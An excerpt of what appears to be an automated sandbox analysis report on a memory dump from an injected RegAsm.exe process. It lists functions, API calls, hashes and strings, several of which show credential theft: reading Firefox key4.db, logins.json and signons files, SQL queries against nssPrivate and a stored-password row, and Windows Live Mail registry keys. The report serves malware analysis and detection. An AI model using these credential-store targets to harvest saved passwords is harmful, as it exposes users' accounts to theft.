                                                                                                                                                                                                                      • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                                                                                                                      • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                                                                                                                                      Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 00401166
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2998058495-0
                                                                                                                                                                                                                      • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                                                                                      • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                                                                                      Function 0040BBF0 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                                        • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                                                                                                                      • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                                                                                                                      • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                                                                                                                      • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040BECE
                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040BEFE
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040BF0C
                                                                                                                                                                                                                      • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                                                                                                                        • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                                                                                                                        • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BFDB
                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                                                      • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                                                      • API String ID: 2303586283-933021314
                                                                                                                                                                                                                      • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                                                                                                                      • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                                                                                                                                                      Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                                                      • API String ID: 231171946-2189169393
                                                                                                                                                                                                                      • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                                                      • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                                                                                      Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                      • API String ID: 633282248-1996832678
                                                                                                                                                                                                                      • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                                                                                      • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                                                                                      Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406782
                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0040686E
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 004068EC
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 004069B2
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 004069CA
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00406A4A
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                                                      • key4.db, xrefs: 00406756
                                                                                                                                                                                                                      • , xrefs: 00406834
                                                                                                                                                                                                                      • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                                                      • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                                                      • API String ID: 3614188050-3983245814
                                                                                                                                                                                                                      • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                                                      • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                                                                                      Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                      • API String ID: 710961058-601624466
                                                                                                                                                                                                                      • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                                                                                                                      • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                                                                                                                      Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                      • API String ID: 3402215030-3842416460
                                                                                                                                                                                                                      • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                                                                                      • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                                                                                      Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                                                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000), ref: 00407B6E
                                                                                                                                                                                                                        • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                                                        • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                                                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                                                      • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                                                      • API String ID: 2003275452-3138536805
                                                                                                                                                                                                                      • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                                                                                      • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                                                                                      Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                                                      • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                                                      • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                                                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                                                                      • API String ID: 1012775001-1343505058
                                                                                                                                                                                                                      • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                                                                                      • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                                                                                                      Function 0040CDDA Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi
                                                                                                                                                                                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                      • API String ID: 1439213657-1959339147
                                                                                                                                                                                                                      • Opcode ID: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                                                                                                                      • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                                                                                                                                                                                      Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444612
                                                                                                                                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444668
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444690
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                                                      • String ID: salu
                                                                                                                                                                                                                      • API String ID: 3691931180-4177317985
                                                                                                                                                                                                                      • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                                                                                      • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                                                                                      Function 00443AAB Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136registrystringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00443AD2
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443B2E
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443B4B
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                                                                                                                        • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Salt, xrefs: 00443BA7
                                                                                                                                                                                                                      • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                                                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                                                                                                                      Memory Dump Source
